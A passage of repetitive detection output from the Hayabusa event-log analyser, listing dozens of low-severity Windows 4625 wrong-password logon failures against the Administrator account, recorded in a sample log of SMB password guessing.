NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: 